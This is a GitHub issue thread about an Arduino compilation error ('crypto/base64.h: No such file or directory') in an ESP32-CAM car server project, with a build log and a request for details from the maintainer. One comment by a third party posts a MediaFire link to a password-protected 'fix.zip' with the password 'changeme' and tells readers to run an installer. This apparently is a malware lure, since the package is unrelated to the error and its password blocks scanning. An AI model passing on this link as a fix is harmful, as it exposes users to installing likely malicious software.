### ISSUE TITLE
crypto/base64.h:

### ISSUE THREAD

**Issue by joydip935** [pablotoledom/ESP32-CAM-car-server#1]
Compilation error: crypto/base64.h: No such file or directory

**Comment by joydip935** [comment]
Which library

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jpablotoledo** [comment]
Hi @joydip935 , i need more information to replicate your error, please send me:

Operating System and version (Distro name and kernel in case of linux)
Arduino IDE version
Screenshots
Terminal log

**Comment by joydip935** [comment]
C:\Users\HP\Downloads\TODAY\car\ESP32-CAM-car-server-main\ESP32-CAM-car-server-main\ESP32-CAM-car-server\ESP32-CAM-car-server.ino:23:12: fatal error: crypto/base64.h: No such file or directory
   23 |   #include "crypto/base64.h"
      |            ^~~~~~~~~~~~~~~~~
compilation terminated.
exit status 1

Compilation error: crypto/base64.h: No such file or directory
![Screenshot 2024-08-30 132446](https://github.com/user-attachments/assets/84e869d4-8ac9-4296-b632-06ae9d4e9c40)

**Comment by joydip935** [comment]
use windows 11
